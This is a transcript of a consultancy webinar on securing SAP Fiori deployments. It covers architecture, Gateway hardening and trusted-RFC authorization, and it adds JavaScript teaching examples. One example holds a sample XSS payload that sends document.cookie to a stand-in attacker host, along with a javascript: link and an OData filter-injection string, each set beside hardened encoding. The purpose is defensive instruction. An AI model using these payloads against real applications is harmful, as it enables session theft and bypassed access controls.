Webinar: Critical Security Considerations for Fiori Deployments
TRANSCRIPT
Guidelines for Securing Fiori Solutions
19 October 2014, BENIMBL.COM
Gary Prewett – Practice Lead, SAP Security
Sarah Lottman – Practice Lead, SAP User Experience
Our Curriculum Vitae
• 2009: Year Founded
• 14x: Growth since inception
• 1: SAP Specialized – No other ERP
• 5280: Headquartered in the Mile-High City – Denver, Colorado
• 174+: Amazing Customers… and counting!!
• 100+: Consultants Strong
• 7+: Average years of SAP Expertise per consultant
• 15+: Market Verticals Supported
• 98%: Client Satisfaction
• Supporting both the Fortune 500 and Midmarket
Our Services
• Fiori: Enhanced and consistent SAP User Experience across Computer, Tablet, and Smartphone.
• SAP AMS: Denver-based SAP delivery for Break/Fix, Enhancement, and Project.
• HANA: Harness the power of SAP HANA with the SAP Business Suite on HANA.
• Mobility: Empower your workforce and business via SAP mobilization.
• SAP + HP Testing: End-to-end SAP and HP Testing services across HP ALM, UFT, LoadRunner, and StormRunner.
• Solution Manager: Run IT like a Factory through Solution Manager's ITIL ALM Product Suite.
• Admin + Infrastructure: Classic Basis, TDMS, LVM, EHP, NetWeaver, and landscape consulting.
• Security: Comprehensive SAP risk mitigation via Audit, toolset, or pure consulting services.
• Projects: Delivery from idea through hypercare, whether laser-focused or a complete project.
• Integration: Connect systems via PI, PO, Web Services, 3rd-party Middleware, etc. via seamless connectivity.
• Enhancement Pack: Maximize your SAP investment with SAP's latest and greatest functionality via EHP application.
• TDMS: Easily replicate data whenever you want from source to target system (Prod > QA, Prod > Training)!
AGENDA
1. Fiori and Security Overview
2. Endpoint Security
3. Architecting for Security
4. Security Configuration
5. Authentication and Authorization
6. Secure Software Development
7. More Information
Fiori and Security Overview
Fast Facts
• SAP's UI of the future: SAP's new user experience technology. Heavy investments made in SAP Fiori and UI5, providing a next-generation user experience. 300+ prebuilt applications that run on ERP, CRM, SRM, HANA and more.
• Run Anywhere: Fiori allows you to run anywhere – Desktop, Tablet and Mobile Devices. Full security of NetWeaver: runs on Mobile Portal, Sybase Unwired Platform and Web Browser.
• Flexibility: The Enhancement Framework allows for modification to suit the customer's needs. Fiori is built on SAPUI5 (whose core is open-sourced as OpenUI5), which gives us the ability to build fully customized Fiori applications.
• Easy branding: The new SAP UI Add-on allows for company brands and custom themes easily. Built on open web standards such as HTML5 and CSS3, which allows for full modification.
Customizable Apps for a Customized Experience
Security Framework: Security Program Scope
• Network Architecture
• Secure Configuration
• Encrypted Communication
• Endpoint Security
• Secure Software Development
• Vulnerability Management
• Authorization
• Authentication
• Track and Monitor
• Regularly Test
• Monitoring
• Maintain Policy
Endpoint Security
Security Overview – Mobile Threat Trends
Mobile Malware
• Remote Access Trojans (RATs) started appearing in 2013, increasingly sophisticated in 2014
• Delivered by packaging with a legitimate app
• Java-based delivery via spear-phishing attacks
Mobile Threat Classifications (2013)
• Track user: 30%
• Steal information: 28%
• Traditional threats (backdoors and downloaders): 20%
Mobile Vulnerabilities (2013)
• Apple iOS iPhone / iPad: 108
• Android: 17
• Blackberry: 1
• Nokia: 1
Source: Internet Security Threat Report 2014. Symantec, 2014. http://www.symantec.com/content/en/us/enterprise/other_resources/b-istr_main_report_v19_21291018.en-us.pdf
Mobile Security Management Options
SAP Afaria – Mobile Device Management
• Device and Security Management
• Incident Management Capabilities
• Device Configuration and Support tools
• Fiori Client App Provisioning and Management
• Granular Mobile Device Security Policies
Existing MDM tools can also be leveraged:
• AirWatch
• Good Technology
• McAfee
• Symantec
SAP Mobile App Protection by Mocana
• A compelling option in a "BYOD" environment
• Treats the mobile device as semi-trusted
• Data-at-rest encryption for the SAP Fiori Client application
• Restrictions on device cut-and-paste functionality
• 256-bit encrypted tunnel (to the Fiori Client)
• Remote application wipe capabilities
Architecting for Security
Infrastructure considerations
[Diagram: the backend data sources (ERP, CRM, Afaria Back End) sit behind a firewall; in front of them, separated by two further firewalls, are the Afaria Server, a Web Application Firewall, the Web Dispatcher and the NetWeaver Gateway. Callouts: "You always want to terminate connections and enforce business logic here!" (on the DMZ) and "Good idea to have" (truncated)]
Key Architectural Design Considerations
• Firewalls: Use firewalls to minimize application attack surface areas. Useful for scoping from an audit perspective.
• DMZ: Location to terminate connections originating outside of your four walls. Some business logic should be enforced here. Systems here should be treated as semi-trusted.
• Web Application Firewalls: Give you real-time visibility into attacks and attack trends. Can be leveraged to
• Web Dispatcher: Reverse proxy only! It can terminate TLS and restrict which URL paths are reachable, but it does not inspect request content, so it offers absolutely no protection for common application-specific attacks: Injection, XSS, XSRF.
Security Configuration
Security Configuration Considerations
Endpoint Security
NetWeaver Gateway Security
• Authentication (can leverage all NetWeaver 7.4 authentication options)
• Standard application server hardening
• Implement gateway services hardening
• Minimize ICF services enabled (can restrict if needed internally using the Web Dispatcher)
• RFC security hardening
• Ensure encryption is enabled for: Web traffic (HTTPS), SSO tickets (if in scope), RFC connections (SNC)
Application Security
Authentication and Authorization
Authentication and Authorization Example
[Diagram: user Todd Witter connects through the outer firewall to the Web Dispatcher in the DMZ and authenticates at the NetWeaver Gateway with his Gateway credentials; the Gateway asserts those credentials across the inner firewall to ERP (ERP asserted credentials).]
Authentication and Authorization Assignment Workflow
1. Credentials asserted to Gateway
   • Auth types supported: Basic, SAML, X.509 Certificates
2. Gateway application role assigned
   • ABAP roles, copied from SAP-delivered roles and modified (PFCG)
3. Accepted? If yes, credentials asserted to ERP
   • Trusted RFCs used
   • With the trust relationship, ERP maps the credentials on the Gateway to ERP credentials
   • The security posture for the Gateway needs to equal the security posture on the backend! With a trust relationship the backend accepts the identity the Gateway asserts, so whoever controls the Gateway can act as any user whose S_RFCACL authorization in ERP permits that trusted logon.
4. ERP OData roles assigned
   • ABAP roles, copied from SAP-delivered roles and modified (PFCG)
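To see why the two systems' postures have to match, the block below models the workflow above as code. It is an added example and not SAP code: users, roles, service names and system IDs are constructed, and the backend check only imitates the S_RFCACL fields (RFC_SYSID, RFC_CLIENT, RFC_USER, RFC_EQUSER) that the trusting system evaluates on a trusted-RFC logon; it is a simplification, not the kernel's actual check. It shows the three places a request can be stopped, and what an over-broad trust entry gives away.

```javascript
// Added example: the hub deployment's authorization chain, modelled in memory.
// Everything below is constructed for the example; none of it is SAP code.

// Gateway hub (system GWH, client 100): who may call which OData service.
const hub = {
  sysid: "GWH", client: "100",
  serviceRole: { ZORDER_SRV: "Z_GW_ORDERS" },
  userRoles: { TWITTER: ["Z_GW_ORDERS"], JDOE: ["Z_GW_ORDERS"] },
};

// Backend ERP: which trusted logons it accepts (S_RFCACL-style) and who may run the service.
const backend = {
  serviceRole: { ZORDER_SRV: "Z_BE_ORDERS" },
  userRoles: { TWITTER: ["Z_BE_ORDERS"], ZINTEGR: ["Z_BE_ORDERS"] },
  trustAcl: {
    // Tight: only the hub, and only "same user ID on both sides" (RFC_EQUSER = Y).
    TWITTER: [{ sysid: "GWH", client: "100", user: "", equser: "Y" }],
    JDOE: [{ sysid: "GWH", client: "100", user: "", equser: "Y" }],
    // Sloppy: any system and any calling user may log on as this service user.
    ZINTEGR: [{ sysid: "*", client: "*", user: "*", equser: "N" }],
  },
};

const wild = (pattern, value) => pattern === "*" || pattern === value;

// Does one ACL entry permit callingUser@sysid/client to log on as targetUser?
function aclPermits(entry, call, targetUser) {
  if (!wild(entry.sysid, call.sysid) || !wild(entry.client, call.client)) return false;
  if (entry.equser === "Y") return call.user === targetUser; // same ID required
  return wild(entry.user, call.user);                         // explicit calling-user pattern
}

function hasRole(system, user, role) {
  return (system.userRoles[user] || []).includes(role);
}

// Backend decision: trusted logon accepted, then the backend's own role check.
function backendAccept(call, targetUser, service) {
  const acl = backend.trustAcl[targetUser] || [];
  if (!acl.some((e) => aclPermits(e, call, targetUser))) return { allowed: false, stage: "trust-acl" };
  if (!hasRole(backend, targetUser, backend.serviceRole[service])) return { allowed: false, stage: "backend-role" };
  return { allowed: true, stage: "ok" };
}

// Normal path: the user authenticated at the hub, the hub asserts the same ID to ERP.
function viaHub(user, service) {
  if (!hasRole(hub, user, hub.serviceRole[service])) return { allowed: false, stage: "hub-role" };
  return backendAccept({ sysid: hub.sysid, client: hub.client, user }, user, service);
}

function scenarios() {
  const rogue = (user) => ({ sysid: "EVIL", client: "000", user }); // attacker-controlled system
  return {
    legit: viaHub("TWITTER", "ZORDER_SRV"),            // both roles, tight ACL
    hubRoleOnly: viaHub("JDOE", "ZORDER_SRV"),         // Gateway role alone grants no data
    notOnHub: viaHub("NOBODY", "ZORDER_SRV"),          // stopped at the hub
    rogueSystem: backendAccept(rogue("TWITTER"), "TWITTER", "ZORDER_SRV"), // ACL stops a non-hub caller
    sloppyAcl: backendAccept(rogue("ANYBODY"), "ZINTEGR", "ZORDER_SRV"),  // wildcard entry: accepted
  };
}

console.log(scenarios());
```

The last scenario is the audit finding: a wildcard trust entry lets any system assert the service user. The first scenarios show the limit of the ACL as well: the calling system supplies the calling user ID, so a fully compromised hub can satisfy an RFC_EQUSER = Y entry for any user it chooses. That is exactly why the slide insists the Gateway be hardened to the same standard as the backend.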
Secure Fiori Development
OWASP – A Great Resource to Stay Current
OWASP Top Ten Web Application Vulnerabilities (2013)
A1 – Injection
A2 – Broken Authentication and Session Management
A3 – Cross-Site Scripting (XSS)
A4 – Insecure Direct Object References
A5 – Security Misconfiguration
A6 – Sensitive Data Exposure
A7 – Missing Function Level Access Control
A8 – Cross-Site Request Forgery (CSRF)
A9 – Using Components with Known Vulnerabilities
A10 – Unvalidated Redirects and Forwards
Best Practices for Fiori Apps
• Follow ABAP best practices (avoid CALL TRANSACTION and kernel calls driven by user input; don't pass user input into Open SQL statements without validation, etc.)
• Use Code Inspector to catch ABAP-specific vulnerabilities
• Educate Fiori developers on common web application vulnerabilities (train on the "Protecting SAP Applications" guide: https://support.sap.com/content/dam/library/support/support-programs-services/support-services/Protecting-SAP-Apps.pdf)
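On the UI5 side of a Fiori app, A1 and A3 usually come down to two encoding mistakes. The block below is an added example, not SAPUI5 code and not from the slides: each mistake beside its hardened form, over a constructed OData record. The encoder is modelled on jQuery.sap.encodeHTML (today sap/base/security/encodeXML), which turns every character outside a small safe set into a numeric entity; here the space is left unencoded for readability. The $filter case is not SQL injection, because Gateway parses the filter, but concatenating input still lets a user rewrite the filter the app intended.

```javascript
// Added example (not SAPUI5 code): output encoding and OData literal escaping
// for untrusted data in a Fiori app. The record below is constructed sample data.
const untrustedCustomer = {
  Name: "Acme <img src=x onerror=\"fetch('//evil.example/'+document.cookie)\">",
  Website: "javascript:alert(document.cookie)",
  City: "Denver",
};

// --- A3: cross-site scripting --------------------------------------------------
// Every character outside [A-Za-z0-9,.-_ ] becomes a hex entity, so no untrusted
// byte can open a tag or close an attribute, whatever the surrounding markup is.
function encodeHTML(str) {
  return String(str).replace(/[^A-Za-z0-9,.\-_ ]/g,
    (ch) => "&#x" + ch.charCodeAt(0).toString(16) + ";");
}

// Only schemes a business app legitimately links to; javascript:, data: and the
// like are dropped rather than "sanitised".
function safeHref(url) {
  return /^https?:\/\//i.test(String(url)) ? encodeHTML(url) : "#";
}

// Vulnerable: string-concatenating OData data into markup handed to a
// sap.ui.core.HTML control or innerHTML. Kept here to show what the finding looks like.
function renderCardVulnerable(c) {
  return `<div class="card"><a href="${c.Website}">${c.Name}</a> (${c.City})</div>`;
}

// Hardened: same layout, every data item encoded for the context it lands in.
function renderCardSafe(c) {
  return `<div class="card"><a href="${safeHref(c.Website)}">${encodeHTML(c.Name)}</a> (${encodeHTML(c.City)})</div>`;
}

// --- A1: injection into an OData $filter --------------------------------------
// Vulnerable: the search term can terminate the literal and add its own clause,
// here dropping the tenant restriction the app meant to enforce.
function filterVulnerable(tenant, search) {
  return `Tenant eq '${tenant}' and Name eq '${search}'`;
}

// OData string literals escape a single quote by doubling it. The ODataModel's
// filter handling (sap.ui.model.Filter / ODataUtils) does this for you; do the
// same whenever you build the string yourself.
function odataStringLiteral(value) {
  return "'" + String(value).replace(/'/g, "''") + "'";
}
function filterSafe(tenant, search) {
  return `Tenant eq ${odataStringLiteral(tenant)} and Name eq ${odataStringLiteral(search)}`;
}

function demo() {
  const search = "x' or Tenant ne '"; // constructed attacker input
  return {
    vulnerableHtml: renderCardVulnerable(untrustedCustomer),
    safeHtml: renderCardSafe(untrustedCustomer),
    vulnerableFilter: filterVulnerable("T001", search),
    safeFilter: filterSafe("T001", search),
  };
}

console.log(demo());
```

Data-bound UI5 controls encode bound text by default; the vulnerable pattern appears when developers bypass binding with raw HTML or assemble query strings by hand. The server-side counterpart is the slide's Open SQL point: a $filter string that reaches a dynamic WHERE clause unvalidated turns this into real injection.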
Nimbl does Fiori
Fiori Roadmap
Ideal for those customers who want specific pain points addressed
80 hours – mix of onsite/offsite delivery
Outcome:
• Personalized Fiori Demo – hands-on
• Architecture Document
• Recommendations for Fiori Applications to be delivered
• Custom Fiori Application suggestions – with wireframes
• Specifics on theming and branding to increase usability
Fiori Jumpstart Package
Ideal for those customers who want to rapidly deploy Fiori
6 weeks – mix of onsite/offsite delivery
Outcome:
• Two NetWeaver 7.4 ABAP Installations
• Ten SAP-delivered Transactional Fiori Applications
• Gateway Configuration and Security Hardening
• Configuration of Fiori Launchpad
• Configuration guides with screenshots for each activity
• Fiori Development Workstation installation guide